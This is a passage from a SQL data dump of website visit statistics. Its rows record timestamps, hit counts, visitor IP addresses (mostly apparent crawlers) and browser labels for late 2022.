,1,1,0,0,'93.158.161.69','other'),(566236,1667897609,1,1,0,0,'93.158.161.69','other'),(566237,1667900539,1,1,0,0,'34.220.64.151','chrome'),(566238,1667900567,1,1,0,0,'54.185.248.209','chrome'),(566239,1667908832,5,5,0,0,'20.124.238.3','chrome'),(566240,1667924341,1,1,0,0,'93.158.161.2','other'),(566241,1667924455,1,1,0,0,'77.88.5.234','other'),(566242,1667925088,1,1,0,0,'31.13.103.2','other'),(566243,1667936325,1,0,1,0,'66.249.65.207',''),(566244,1667947257,1,1,0,0,'93.158.161.49','other'),(566245,1667961675,1,1,0,0,'93.158.161.48','other'),(566246,1667972759,1,0,1,0,'66.249.65.209',''),(566247,1667974701,2,2,0,0,'20.232.142.106','chrome'),(566248,1667981569,1,1,0,0,'74.84.150.150','other'),(566249,1667984995,1,0,1,0,'66.249.65.207',''),(566250,1667991877,2,2,0,0,'137.74.27.104','firefox'),(566251,1667993250,48,48,0,0,'208.110.82.162','other'),(566252,1667993255,11,11,0,0,'208.110.82.162','chrome'),(566253,1667999294,6,6,0,0,'139.59.107.179','other'),(566254,1668005371,1,1,0,0,'66.249.69.41','chrome'),(566255,1668011316,1,1,0,0,'66.249.69.41','chrome'),(566256,1668012075,1,1,0,0,'66.249.69.39','chrome'),(566257,1668018521,1,1,0,0,'66.249.69.37','chrome'),(566258,1668023021,1,0,1,0,'66.249.69.39',''),(566259,1668030105,1,1,0,0,'93.158.161.65','other'),(566260,1668036246,1,1,0,0,'183.91.15.246','firefox'),(566261,1668036247,1,1,0,0,'183.91.15.246','chrome'),(566263,1668040738,1,1,0,0,'157.55.39.92','other'),(566264,1668052937,1,1,0,0,'66.249.69.41','chrome'),(566265,1668057383,6,6,0,0,'139.59.107.179','other'),(566266,1668066563,1,1,0,0,'77.88.5.9','other'),(566267,1668067181,1,1,0,0,'87.249.43.162','other'),(566268,1668067720,1,1,0,0,'207.46.13.152','other'),(566269,1668072570,1,1,0,0,'54.191.80.168','chrome'),(566270,1668072601,1,1,0,0,'34.216.13.164','chrome'),(566271,1668072609,1,1,0,0,'52.88.180.194','chrome'),(566272,1668072624,1,1,0,0,'54.200.238.117','chrome'),(566273,1668077634,3,3,0,0,'147.78.47.249','chrome'),(566274,1668078399,1,0,1,0,'66.249.69.39',''),(566275,1668085058,5,5,0,0,'13.76.132.231','chrome'),(566276,1668088996,1,1,0,0,'77.88.5.161','other'),(566277,1668109385,1,0,1,0,'66.249.69.37',''),(566278,1668115293,1,1,0,0,'173.252.107.8','other'),(566279,1668142800,1,1,0,0,'198.235.24.25','other'),(566280,1668154572,2,2,0,0,'85.31.46.185','other'),(566281,1668159142,1,1,0,0,'34.208.231.191','chrome'),(566282,1668159145,1,1,0,0,'18.236.62.43','chrome'),(566283,1668159163,2,2,0,0,'35.90.202.246','chrome'),(566284,1668159167,2,2,0,0,'54.188.33.166','chrome'),(566285,1668163858,1,1,0,0,'31.13.115.117','other'),(566286,1668194003,1,1,0,0,'137.184.140.67','firefox'),(566287,1668195602,1,0,1,0,'66.249.66.59',''),(566288,1668213196,1,1,0,0,'198.235.24.37','other'),(566289,1668216569,1,1,0,0,'198.235.24.169','other'),(566290,1668217253,1,1,0,0,'198.235.24.158','other'),(566291,1668246412,1,1,0,0,'31.13.127.13','other'),(566292,1668247650,1,1,0,0,'93.158.161.40','other'),(566293,1668257478,1,1,0,0,'31.13.127.20','other'),(566294,1668259253,1,1,0,0,'198.235.24.44','other'),(566295,1668282000,1,0,1,0,'66.249.76.73',''),(566296,1668283975,1,1,0,0,'31.172.80.137','firefox'),(566297,1668284911,1,1,0,0,'93.158.161.36','other'),(566298,1668289544,1,1,0,0,'77.88.5.161','other'),(566299,1668290635,1,1,0,0,'77.88.5.212','other'),(566300,1668306533,2,1,1,0,'66.249.76.69',''),(566301,1668312123,1,1,0,0,'199.244.88.231','chrome'),(566302,1668312278,1,1,0,0,'207.46.13.144','chrome'),(566303,1668318354,1,1,0,0,'207.46.13.152','other'),(566304,1668333630,1,1,0,0,'77.88.5.33','other'),(566305,1668345508,1,1,0,0,'205.210.31.15','other'),(566306,1668348818,1,1,0,0,'66.249.65.207','chrome'),(566307,1668348932,1,0,1,0,'66.249.65.209',''),(566308,1668353150,2,2,0,0,'208.67.106.91','chrome'),(566309,1668354086,1,1,0,0,'46.211.116.137','chrome'),(566310,1668368422,1,0,1,0,'66.249.65.209',''),(566311,1668372473,1,0,1,0,'66.249.65.211',''),(566312,1668419899,1,1,0,0,'46.211.0.42','chrome'),(566313,1668429139,22,22,0,0,'147.182.131.35','chrome'),(566314,1668438725,1,1,0,0,'66.249.65.207','chrome'),(566315,1668447941,1,1,0,0,'157.55.39.95','chrome'),(566316,1668454892,1,0,1,0,'66.249.65.211',''),(566317,1668455148,1,0,1,0,'66.249.65.209',''),(566318,1668455202,1,1,0,0,'66.249.65.211','chrome'),(566319,1668500863,1,1,0,0,'157.55.39.193','chrome'),(566320,1668532299,1,1,0,0,'185.158.115.77','msie'),(566321,1668534014,1,1,0,0,'157.55.39.95','other'),(566322,1668541415,1,0,1,0,'66.249.65.207',''),(566323,1668544315,1,1,0,0,'207.46.13.152','other'),(566324,1668558099,3,3,0,0,'147.78.47.249','chrome'),(566325,1668559597,1,0,1,0,'66.249.65.207',''),(566326,1668565116,1,1,0,0,'207.46.13.183','other'),(566327,1668567144,1,1,0,0,'198.235.24.134','other'),(566328,1668567782,5,5,0,0,'3.129.210.239','chrome'),(566329,1668573470,9,9,0,0,'20.250.1.124','other'),(566330,1668575267,1,1,0,0,'66.249.65.211','chrome'),(566331,1668578296,1,1,0,0,'66.249.65.209','chrome'),(566332,1668580281,1,1,0,0,'205.210.31.27','other'),(566333,1668580755,1,1,0,0,'66.249.65.209','chrome'),(566334,1668586040,1,1,0,0,'66.249.65.209','chrome'),(566335,1668588331,1,1,0,0,'207.46.13.152','chrome'),(566336,1668590127,1,1,0,0,'49.212.137.20','chrome'),(566337,1668591715,1,1,0,0,'54.202.100.142','chrome'),(566338,1668591749,2,2,0,0,'52.25.235.73','chrome'),(566339,1668591752,1,1,0,0,'54.191.12.245','chrome'),(566340,1668592122,1,0,1,0,'66.249.65.211',''),(566341,1668593483,1,1,0,0,'66.249.65.207','chrome'),(566342,1668593485,1,0,1,0,'66.249.65.211',''),(566343,1668602613,1,1,0,0,'66.249.65.209','chrome'),(566344,1668607629,5,5,0,0,'194.169.175.22','chrome'),(566345,1668611262,1,1,0,0,'185.181.60.189','chrome'),(566346,1668615063,3,3,0,0,'20.250.1.124','chrome'),(566347,1668615184,1,0,1,0,'66.249.65.211',''),(566348,1668617205,1,0,1,0,'66.249.65.211',''),(566349,1668617832,1,1,0,0,'66.249.65.207','chrome'),(566350,1668617837,1,1,0,0,'66.249.65.209','chrome'),(566351,1668623494,1,1,0,0,'66.249.65.211','chrome'),(566352,1668624456,1,1,0,0,'66.249.65.207','chrome'),(566353,1668626261,5,5,0,0,'20.198.221.121','chrome'),(566354,1668627779,1,0,1,0,'66.249.65.209',''),(566355,1668631078,2,1,1,0,'66.249.65.207',''),(566356,1668634139,1,1,0,0,'66.249.65.211','chrome'),(566357,1668635480,1,0,1,0,'66.249.65.211',''),(566358,1668637890,1,1,0,0,'91.196.178.209','chrome'),(566359,1668642327,1,1,0,0,'66.249.65.211','chrome'),(566360,1668643618,1,1,0,0,'207.46.13.185','other'),(566361,1668643644,1,1,0,0,'207.46.13.152','chrome'),(566362,1668646687,1,1,0,0,'66.249.65.211','chrome'),(566363,1668647572,1,1,0,0,'207.46.13.195','other'),(566364,1668655286,1,1,0,0,'66.249.65.207','chrome'),(566365,1668656571,1,1,0,0,'157.55.39.221','other'),(566366,1668662025,1,1,0,0,'66.249.65.209','chrome'),(566367,1668663388,2,2,0,0,'66.249.65.209','chrome'),(566368,1668664372,1,1,0,0,'66.249.65.211','chrome'),(566369,1668670361,1,1,0,0,'66.249.65.211','chrome'),(566370,1668670365,1,1,0,0,'66.249.65.207','chrome'),(566371,1668675612,1,1,0,0,'66.249.65.209','chrome'),(566372,1668680131,1,1,0,0,'54.189.135.79','chrome'),(566373,1668680226,1,1,0,0,'35.92.240.230','chrome'),(566374,1668685410,5,5,0,0,'20.198.221.121','chrome'),(566375,1668692174,1,0,1,0,'66.249.65.211',''),(566376,1668692638,1,1,0,0,'143.244.46.218','chrome'),(566377,1668707333,1,1,0,0,'173.252.111.13','other'),(566378,1668714162,1,0,1,0,'66.249.65.209',''),(566379,1668722531,1,1,0,0,'198.235.24.12','other'),(566380,1668727279,1,1,0,0,'66.249.65.207','chrome'),(566381,1668752827,1,1,0,0,'173.252.83.120','other'),(566382,1668785250,1,0,1,0,'66.249.70.39',''),(566383,1668785934,1,1,0,0,'66.249.70.37','chrome'),(566384,1668800559,1,0,1,0,'66.249.70.37',''),(566385,1668803986,1,1,0,0,'66.249.70.37','chrome'),(566386,1668813277,5,5,0,0,'20.24.21.64','chrome'),(566387,1668822095,1,1,0,0,'198.235.24.181','other'),(566388,1668843558,1,1,0,0,'51.15.251.143','other'),(566389,1668849996,1,1,0,0,'52.33.22.1','chrome'),(566390,1668851788,1,1,0,0,'185.237.217.11','other'),(566391,1668883922,1,1,0,0,'46.211.235.210','chrome'),(566392,1668887197,1,0,1,0,'66.249.65.207',''),(566393,1668897072,1,1,0,0,'157.55.39.221','other'),(566394,1668915695,1,1,0,0,'205.210.31.34','other'),(566395,1668917284,1,1,0,0,'205.210.31.38','other'),(566396,1668919891,1,1,0,0,'95.108.213.61','other'),(566397,1668925679,1,1,0,0,'178.94.111.126','other'),(566398,1668933677,1,1,0,0,'51.81.167.146','other'),(566399,1668933691,15,15,0,0,'139.144.188.181','other'),(566400,1668933692,15,15,0,0,'45.33.108.175','other'),(566401,1668933697,1,1,0,0,'139.144.188.181','chrome'),(566402,1668933698,1,1,0,0,'45.33.108.175','chrome'),(566403,1668933709,1,1,0,0,'205.169.39.63','chrome'),(566404,1668933732,1,1,0,0,'39.110.218.101','other'),(566405,1668933791,1,1,0,0,'206.189.226.1','other'),(566406,1668939241,1,1,0,0,'157.55.39.95','chrome'),(566407,1668940868,1,1,0,0,'133.242.174.119','other'),(566409,1668944537,1,1,0,0,'157.55.39.193','other'),(566410,1668947834,4,4,0,0,'144.217.135.206','chrome'),(566411,1668947869,1,1,0,0,'149.56.150.20','other'),(566412,1668949538,1,1,0,0,'31.13.127.5','other'),(566413,1668956460,1,1,0,0,'109.234.161.143','chrome'),(566414,1668971235,1,1,0,0,'207.46.13.189','other'),(566415,1668973655,1,0,1,0,'66.249.65.211',''),(566416,1668974346,1,1,0,0,'46.211.118.105','chrome'),(566417,1668979625,1,1,0,0,'66.249.65.211','chrome'),(566418,1668985209,1,1,0,0,'207.46.13.189','chrome'),(566419,1668989429,1,1,0,0,'68.69.184.202','other'),(566420,1668995245,1,1,0,0,'66.249.65.211','chrome'),(566421,1668996839,1,1,0,0,'5.45.207.122','other'),(566422,1668997640,1,1,0,0,'31.13.127.22','other'),(566423,1668997951,1,1,0,0,'31.13.127.8','other'),(566424,1669001186,1,1,0,0,'157.55.39.95','chrome'),(566425,1669007536,1,1,0,0,'68.69.184.202','other'),(566426,1669008252,10,10,0,0,'62.171.177.111','chrome'),(566427,1669008860,1,1,0,0,'54.89.176.229','other'),(566428,1669008863,1,1,0,0,'3.86.80.228','chrome'),(566429,1669008866,1,1,0,0,'44.201.167.206','chrome'),(566430,1669016564,1,1,0,0,'87.250.224.82','other'),(566431,1669017310,1,1,0,0,'193.34.73.174','firefox'),(566432,1669017349,1,1,0,0,'64.43.111.162','chrome'),(566433,1669020456,38,38,0,0,'194.169.175.22','chrome'),(566434,1669021365,34,34,0,0,'194.169.175.22','chrome'),(566435,1669025945,1,1,0,0,'46.211.228.23','other'),(566436,1669034130,1,1,0,0,'207.46.13.189','other'),(566437,1669036455,1,1,0,0,'146.120.168.174','chrome'),(566438,1669038146,3,3,0,0,'147.78.47.249','chrome'),(566439,1669047530,1,1,0,0,'5.255.253.110','other'),(566440,1669050660,2,2,0,0,'128.199.31.216','firefox'),(566441,1669059789,1,0,1,0,'66.249.65.211',''),(566442,1669066210,1,1,0,0,'217.196.161.106','chrome'),(566443,1669087156,2,2,0,0,'15.235.12.96','chrome'),(566444,1669089487,1,1,0,0,'157.55.39.193','chrome'),(566445,1669100796,1,1,0,0,'207.46.13.185','chrome'),(566446,1669100867,2,2,0,0,'45.135.17.19','chrome'),(566447,1669104879,1,1,0,0,'176.53.223.147','chrome'),(566448,1669104904,1,1,0,0,'45.135.17.165','chrome'),(566449,1669106697,1,1,0,0,'74.84.150.150','other'),(566450,1669115661,1,1,0,0,'51.158.109.3','other'),(566451,1669127811,1,1,0,0,'91.196.178.169','chrome'),(566452,1669129342,1,1,0,0,'205.210.31.182','other'),(566453,1669130247,1,1,0,0,'173.252.83.119','other'),(566454,1669133740,1,1,0,0,'87.250.224.44','other'),(566455,1669140244,1,1,0,0,'5.45.207.92','other'),(566456,1669140278,1,1,0,0,'87.250.224.33','other'),(566457,1669146142,10,10,0,0,'5.189.172.220','chrome'),(566458,1669146209,1,0,1,0,'66.249.69.57',''),(566459,1669149289,1,1,0,0,'166.62.103.104','firefox'),(566460,1669155939,1,1,0,0,'213.180.203.5','other'),(566461,1669162118,1,1,0,0,'157.55.39.221','other'),(566462,1669171391,1,1,0,0,'66.249.69.39','chrome'),(566463,1669189099,2,2,0,0,'89.104.110.83','chrome'),(566464,1669190395,1,1,0,0,'91.196.178.169','chrome'),(566465,1669193245,2,2,0,0,'176.53.221.244','chrome'),(566466,1669203194,1,1,0,0,'66.249.69.37','chrome'),(566467,1669209443,1,1,0,0,'207.46.13.189','chrome'),(566468,1669220238,2,2,0,0,'13.57.26.242','firefox'),(566469,1669226325,1,1,0,0,'74.84.150.150','other'),(566470,1669232511,1,1,0,0,'51.158.127.119','other'),(566471,1669232700,1,0,1,0,'66.249.65.207',''),(566472,1669234196,1,1,0,0,'207.46.13.189','chrome'),(566473,1669241117,1,1,0,0,'207.46.13.185','chrome'),(566474,1669246248,1,0,1,0,'66.249.65.211',''),(566475,1669252256,1,1,0,0,'74.103.188.6','chrome'),(566476,1669257318,1,1,0,0,'68.69.184.202','other'),(566477,1669264565,1,1,0,0,'20.197.90.45','chrome'),(566478,1669297252,1,1,0,0,'35.87.90.107','chrome'),(566479,1669305091,1,1,0,0,'66.249.66.59','chrome'),(566480,1669306327,1,1,0,0,'66.249.66.61','chrome'),(566481,1669308924,1,1,0,0,'66.249.66.57','chrome'),(566482,1669313596,1,1,0,0,'66.249.66.61','chrome'),(566483,1669318031,1,0,1,0,'66.249.66.59',''),(566484,1669318635,1,1,0,0,'207.46.13.185','chrome'),(566485,1669319040,1,0,1,0,'66.249.66.57',''),(566486,1669320269,1,1,0,0,'205.210.31.32','other'),(566487,1669323413,1,1,0,0,'69.63.184.117','other'),(566488,1669325957,1,1,0,0,'66.249.66.57','chrome'),(566489,1669326782,1,1,0,0,'87.250.224.47','other'),(566490,1669327964,1,1,0,0,'157.55.39.221','chrome'),(566491,1669330801,1,1,0,0,'66.249.66.59','chrome'),(566492,1669333374,1,0,1,0,'66.249.66.57',''),(566493,1669337901,1,0,1,0,'66.249.66.59',''),(566494,1669337911,1,1,0,0,'66.249.66.57','chrome'),(566495,1669346669,1,1,0,0,'66.249.66.61','chrome'),(566496,1669350279,1,1,0,0,'66.249.66.61','chrome'),(566497,1669353669,1,1,0,0,'68.69.184.202','other'),(566498,1669354882,1,1,0,0,'66.249.66.59','chrome'),(566499,1669359767,2,2,0,0,'66.249.66.61','chrome'),(566500,1669370454,1,1,0,0,'66.249.66.59','chrome'),(566501,1669381821,1,1,0,0,'46.211.5.81','chrome'),(566502,1669384745,5,5,0,0,'157.230.186.55','chrome'),(566503,1669387293,1,1,0,0,'157.55.39.95','chrome'),(566504,1669389159,1,1,0,0,'185.237.217.27','chrome'),(566505,1669396965,1,1,0,0,'194.38.20.161','other'),(566506,1669401775,1,1,0,0,'207.46.13.185','chrome'),(566507,1669405462,1,0,1,0,'66.249.65.207',''),(566508,1669412017,1,1,0,0,'185.181.60.39','chrome'),(566509,1669424285,1,1,0,0,'95.108.213.44','other'),(566510,1669432532,1,0,1,0,'66.249.65.211',''),(566511,1669459979,4,4,0,0,'109.70.108.10','chrome'),(566512,1669464615,1,1,0,0,'205.210.31.29','other'),(566513,1669464865,1,1,0,0,'68.69.184.202','other'),(566514,1669470661,1,1,0,0,'114.119.157.217','other'),(566515,1669488382,1,1,0,0,'64.246.187.42','firefox'),(566516,1669491882,1,0,1,0,'66.249.65.207',''),(566517,1669495786,1,1,0,0,'173.252.83.116','other'),(566518,1669502159,1,1,0,0,'66.249.65.209','chrome'),(566519,1669502187,2,1,1,0,'66.249.65.207',''),(566520,1669508766,1,1,0,0,'158.255.80.210','firefox'),(566521,1669515596,1,1,0,0,'66.249.65.211','chrome'),(566522,1669515729,1,0,1,0,'66.249.65.207',''),(566523,1669533579,1,0,1,0,'66.249.65.207',''),(566524,1669534317,1,0,1,0,'66.249.65.211',''),(566525,1669542344,1,1,0,0,'54.71.42.180','chrome'),(566526,1669542359,2,2,0,0,'35.92.238.131','chrome'),(566527,1669542377,1,1,0,0,'34.214.143.13','chrome'),(566528,1669542487,2,2,0,0,'34.219.131.213','chrome'),(566529,1669557825,1,1,0,0,'157.55.39.95','chrome'),(566530,1669558587,1,1,0,0,'5.53.115.178','chrome'),(566531,1669559553,1,1,0,0,'74.84.150.150','other'),(566532,1669575974,1,1,0,0,'65.109.138.134','other'),(566533,1669578272,1,0,1,0,'66.249.65.209',''),(566534,1669579263,1,1,0,0,'5.255.253.181','other'),(566535,1669579266,1,1,0,0,'95.108.213.61','other'),(566536,1669582724,1,1,0,0,'114.119.157.158','other'),(566537,1669586720,1,1,0,0,'194.38.20.161','other'),(566538,1669611496,1,1,0,0,'207.46.13.185','other'),(566539,1669611571,1,1,0,0,'157.55.39.143','other'),(566540,1669616027,1,1,0,0,'157.55.39.221','other'),(566541,1669628770,1,1,0,0,'35.90.189.227','chrome'),(566542,1669628810,1,1,0,0,'34.216.125.158','chrome'),(566543,1669640596,1,1,0,0,'74.84.150.150','other'),(566544,1669642758,1,1,0,0,'95.170.216.161','chrome'),(566545,1669657473,2,2,0,0,'185.237.217.11','chrome'),(566546,1669664494,1,1,0,0,'157.55.39.221','chrome'),(566547,1669664514,9,9,0,0,'172.173.249.236','other'),(566548,1669664675,1,0,1,0,'66.249.65.207',''),(566549,1669665125,1,0,1,0,'66.249.65.211',''),(566550,1669665171,2,2,0,0,'66.249.65.209','chrome'),(566551,1669688828,3,3,0,0,'147.78.47.249','chrome'),(566552,1669707196,1,1,0,0,'5.255.253.108','other'),(566553,1669707372,1,1,0,0,'87.250.224.110','other'),(566554,1669707377,1,1,0,0,'5.255.253.111','other'),(566555,1669726672,1,1,0,0,'194.169.175.135','chrome'),(566556,1669730992,9,9,0,0,'20.163.228.194','other'),(566557,1669733106,3,3,0,0,'20.163.228.194','chrome'),(566558,1669738154,1,1,0,0,'157.55.39.221','other'),(566559,1669741064,1,1,0,0,'67.222.131.158','firefox'),(566560,1669742413,1,1,0,0,'66.249.76.59','chrome'),(566561,1669745141,1,1,0,0,'66.249.66.57','chrome'),(566562,1669745470,1,1,0,0,'66.249.76.61','chrome'),(566563,1669745730,1,1,0,0,'183.136.225.45','firefox'),(566564,1669745735,2,2,0,0,'183.136.225.45','chrome'),(566565,1669746286,1,1,0,0,'66.249.66.57','chrome'),(566566,1669747903,1,1,0,0,'207.46.13.185','other'),(566567,1669751083,1,0,1,0,'66.249.76.57',''),(566568,1669777251,1,1,0,0,'66.249.76.59','chrome'),(566569,1669782029,5,5,0,0,'18.118.128.170','chrome'),(566570,1669789759,1,1,0,0,'5.255.253.108','other'),(566571,1669794674,1,1,0,0,'194.169.175.135','chrome'),(566572,1669795206,1,1,0,0,'205.210.31.40','other'),(566573,1669797118,1,1,0,0,'66.249.66.59','chrome'),(566574,1669801766,1,1,0,0,'52.39.13.34','firefox'),(566575,1669806760,1,0,1,0,'66.249.76.174',''),(566576,1669809033,1,1,0,0,'66.249.66.57','chrome'),(566577,1669827549,1,1,0,0,'161.97.83.178','firefox'),(566578,1669829965,1,1,0,0,'194.38.20.161','other'),(566579,1669830175,1,1,0,0,'31.13.127.26','other'),(566580,1669830176,1,1,0,0,'31.13.103.3','other'),(566581,1669836861,1,1,0,0,'157.55.39.221','other'),(566582,1669837661,1,0,1,0,'66.249.70.39',''),(566583,1669840375,1,1,0,0,'66.249.70.37','chrome'),(566584,1669845881,1,1,0,0,'66.249.70.39','chrome'),(566585,1669848217,1,1,0,0,'185.237.217.14','chrome'),(566586,1669850684,1,0,1,0,'66.249.70.39',''),(566587,1669852261,1,1,0,0,'66.249.70.39','chrome'),(566588,1669857495,1,1,0,0,'194.169.175.135','chrome'),(566589,1669859311,1,1,0,0,'94.178.233.189','chrome'),(566590,1669859375,3,3,0,0,'40.122.115.87','other'),(566591,1669864673,1,1,0,0,'209.217.240.32','other'),(566592,1669864674,1,1,0,0,'209.217.240.32','chrome'),(566593,1669874036,1,1,0,0,'66.249.70.37','chrome'),(566594,1669874690,1,1,0,0,'157.55.39.143','other'),(566595,1669884039,1,1,0,0,'66.249.70.41','chrome'),(566596,1669889516,1,0,1,0,'66.249.70.37',''),(566597,1669906654,1,1,0,0,'66.249.70.41','chrome'),(566598,1669907655,1,1,0,0,'66.249.70.37','chrome'),(566599,1669908652,1,1,0,0,'66.249.70.39','chrome'),(566600,1669913810,1,1,0,0,'207.46.13.195','chrome'),(566601,1669913819,1,0,1,0,'66.249.70.37',''),(566602,1669913892,1,1,0,0,'66.249.70.39','chrome'),(566603,1669914549,1,1,0,0,'66.249.70.37','chrome'),(566604,1669918618,1,1,0,0,'20.220.56.217','chrome'),(566605,1669923563,1,1,0,0,'66.249.70.37','chrome'),(566606,1669929852,1,0,1,0,'66.249.70.63',''),(566607,1669930459,1,1,0,0,'66.249.70.34','chrome'),(566608,1669932064,3,3,0,0,'147.78.47.249','chrome'),(566609,1669932785,5,5,0,0,'20.198.221.121','chrome'),(566610,1669935925,1,1,0,0,'157.55.39.221','other'),(566611,1669937207,1,1,0,0,'31.13.127.3','other'),(566612,1669937707,1,1,0,0,'66.249.70.63','chrome'),(566613,1669942419,1,0,1,0,'66.249.70.34',''),(566614,1669944358,1,0,1,0,'66.249.70.34',''),(566615,1669947244,1,0,1,0,'66.249.70.37',''),(566616,1669952718,2,2,0,0,'51.158.37.209','firefox'),(566617,1669966201,1,1,0,0,'207.46.13.185','chrome'),(566618,1669969467,4,4,0,0,'35.212.234.187','chrome'),(566619,1669978454,1,1,0,0,'46.211.102.6','chrome'),(566620,1669980351,2,2,0,0,'143.244.183.136','chrome'),(566621,1669981134,1,1,0,0,'194.169.175.135','chrome'),(566622,1669982510,1,1,0,0,'69.171.249.11','other'),(566623,1669983686,5,5,0,0,'159.89.49.180','chrome'),(566624,1670009325,1,1,0,0,'157.55.39.95','other'),(566625,1670015692,1,0,1,0,'66.249.70.34',''),(566626,1670023559,1,1,0,0,'66.249.70.39','chrome'),(566627,1670027792,1,1,0,0,'157.55.39.221','other'),(566628,1670034455,1,1,0,0,'198.235.24.24','other'),(566629,1670052762,2,2,0,0,'173.252.87.9','chrome'),(566630,1670052771,1,1,0,0,'173.252.87.6','chrome'),(566631,1670056387,1,1,0,0,'66.249.70.57','chrome'),(566632,1670075925,1,1,0,0,'68.69.184.202','other'),(566633,1670093697,1,1,0,0,'198.235.24.59','other'),(566634,1670102113,1,0,1,0,'66.249.70.57',''),(566635,1670106435,1,1,0,0,'173.252.83.22','other'),(566636,1670116459,1,0,1,0,'66.249.70.61',''),(566637,1670117232,1,1,0,0,'74.84.150.150','other'),(566638,1670124567,1,1,0,0,'157.55.39.221','chrome'),(566639,1670132622,1,1,0,0,'194.169.175.135','chrome'),(566640,1670144490,1,1,0,0,'5.75.225.44','chrome'),(566641,1670146721,1,1,0,0,'194.169.175.135','chrome'),(566642,1670168766,1,1,0,0,'157.55.39.95','other'),(566643,1670169880,1,1,0,0,'198.235.24.51','other'),(566644,1670188500,1,0,1,0,'66.249.70.59',''),(566645,1670195960,1,1,0,0,'18.237.248.103','firefox'),(566646,1670197838,1,1,0,0,'199.244.88.226','chrome'),(566647,1670202773,1,1,0,0,'157.55.39.95','other'),(566648,1670205549,1,1,0,0,'157.55.39.95','chrome'),(566649,1670217191,1,1,0,0,'198.235.24.36','other'),(566650,1670264537,1,1,0,0,'5.255.253.190','other'),(566651,1670270150,1,1,0,0,'66.249.70.61','chrome'),(566652,1670274916,1,0,1,0,'66.249.70.57',''),(566653,1670278113,1,1,0,0,'5.45.207.95','other'),(566654,1670280104,1,0,1,0,'66.249.70.59',''),(566655,1670287718,1,0,1,0,'66.249.70.57',''),(566656,1670289590,1,1,0,0,'198.235.24.17','other'),(566657,1670298357,1,1,0,0,'66.249.70.59','chrome'),(566658,1670299416,1,1,0,0,'109.239.58.107','chrome'),(566659,1670302826,1,1,0,0,'194.38.20.161','other'),(566660,1670313195,1,1,0,0,'91.196.178.169','chrome'),(566661,1670313919,1,1,0,0,'144.91.121.130','chrome'),(566662,1670320097,1,1,0,0,'34.219.155.82','chrome'),(566663,1670320292,1,1,0,0,'54.149.14.185','chrome'),(566664,1670337940,1,1,0,0,'76.72.172.166','firefox'),(566665,1670348460,1,1,0,0,'178.128.104.173','firefox'),(566666,1670355454,3,3,0,0,'194.60.77.32','chrome'),(566667,1670356774,1,1,0,0,'194.60.77.32','chrome'),(566668,1670359555,1,0,1,0,'66.249.70.34',''),(566669,1670365942,1,1,0,0,'207.46.13.195','other'),(566670,1670367769,1,1,0,0,'54.195.3.228','other'),(566671,1670368447,1,1,0,0,'66.249.70.34','chrome'),(566672,1670398077,1,1,0,0,'167.99.72.125','firefox'),(566673,1670402332,3,3,0,0,'147.78.47.249','chrome'),(566674,1670417448,1,1,0,0,'31.13.127.2','other'),(566675,1670441456,5,5,0,0,'178.128.80.218','chrome'),(566676,1670444025,1,1,0,0,'66.249.70.34','chrome'),(566677,1670445962,1,0,1,0,'66.249.70.59',''),(566678,1670450097,1,1,0,0,'87.236.176.43','other'),(566679,1670450098,1,1,0,0,'87.236.176.192','chrome'),(566680,1670450100,1,1,0,0,'68.183.53.77','chrome'),(566681,1670459326,1,0,1,0,'66.249.70.34',''),(566682,1670473792,1,1,0,0,'207.46.13.195','chrome'),(566683,1670476510,1,1,0,0,'194.38.20.161','other'),(566684,1670479499,1,0,1,0,'66.249.70.59',''),(566685,1670503336,1,1,0,0,'207.46.13.195','chrome'),(566686,1670514074,1,1,0,0,'207.46.13.189','chrome'),(566687,1670524394,1,1,0,0,'207.46.13.195','chrome'),(566688,1670532381,1,0,1,0,'66.249.70.63',''),(566689,1670538689,1,1,0,0,'157.55.39.221','other'),(566690,1670554123,1,1,0,0,'68.69.184.202','other'),(566691,1670555440,1,1,0,0,'157.55.39.221','other'),(566692,1670558467,1,1,0,0,'87.250.224.160','other'),(566693,1670564947,1,1,0,0,'5.255.231.112','other'),(566694,1670581859,1,1,0,0,'173.252.83.24','other'),(566695,1670599257,1,1,0,0,'87.250.224.16','other'),(566696,1670604892,1,1,0,0,'158.69.26.40','firefox'),(566697,1670615019,1,1,0,0,'87.236.176.59','other'),(566698,1670615021,1,1,0,0,'87.236.176.217','chrome'),(566699,1670615022,1,1,0,0,'104.248.204.195','chrome'),(566700,1670615034,1,1,0,0,'88.208.225.209','chrome'),(566701,1670618824,1,0,1,0,'66.249.70.63',''),(566702,1670621688,1,1,0,0,'66.249.70.63','chrome'),(566703,1670642813,1,1,0,0,'66.249.70.37','chrome'),(566704,1670650826,1,1,0,0,'87.250.224.106','other'),(566705,1670652478,1,1,0,0,'5.255.253.190','other'),(566706,1670653301,1,1,0,0,'74.84.150.150','other'),(566707,1670656391,1,1,0,0,'194.38.20.161','other'),(566708,1670664339,1,1,0,0,'68.69.184.202','other'),(566709,1670665043,1,1,0,0,'34.221.108.188','chrome'),(566710,1670665063,1,1,0,0,'34.209.139.83','chrome'),(566711,1670665069,2,2,0,0,'18.237.204.240','chrome'),(566712,1670665896,3,3,0,0,'34.93.61.237','chrome'),(566713,1670665943,2,2,0,0,'35.89.196.240','chrome'),(566714,1670668013,1,0,1,0,'66.249.70.63',''),(566715,1670678670,1,1,0,0,'184.72.205.128','chrome'),(566716,1670683500,2,2,0,0,'165.227.48.74','chrome'),(566717,1670696320,1,0,1,0,'66.249.70.37',''),(566718,1670696726,1,1,0,0,'66.249.70.37','chrome'),(566719,1670697819,1,1,0,0,'184.72.205.128','chrome'),(566720,1670698016,1,1,0,0,'87.250.224.83','other'),(566721,1670705214,1,0,1,0,'66.249.70.34',''),(566722,1670705356,1,1,0,0,'139.59.5.55','chrome'),(566723,1670711010,1,1,0,0,'207.46.13.195','chrome'),(566724,1670714710,1,1,0,0,'87.250.224.143','other'),(566725,1670716080,1,1,0,0,'5.45.207.95','other'),(566726,1670724037,1,1,0,0,'5.45.207.119','chrome'),(566727,1670725126,2,1,1,0,'66.249.70.63',''),(566728,1670731211,1,1,0,0,'68.69.184.202','other'),(566729,1670739545,3,3,0,0,'147.78.47.249','chrome'),(566730,1670746478,1,1,0,0,'66.249.70.37','chrome'),(566731,1670746882,1,1,0,0,'65.154.226.168','chrome'),(566732,1670746943,2,2,0,0,'205.169.39.63','chrome'),(566733,1670748309,1,1,0,0,'65.154.226.166','chrome'),(566734,1670748625,1,0,1,0,'66.249.70.37',''),(566735,1670753317,1,1,0,0,'66.249.70.63','chrome'),(566736,1670771041,1,1,0,0,'47.57.186.73','firefox'),(566737,1670778366,1,1,0,0,'5.255.253.172','chrome'),(566738,1670786906,1,1,0,0,'23.254.228.172','c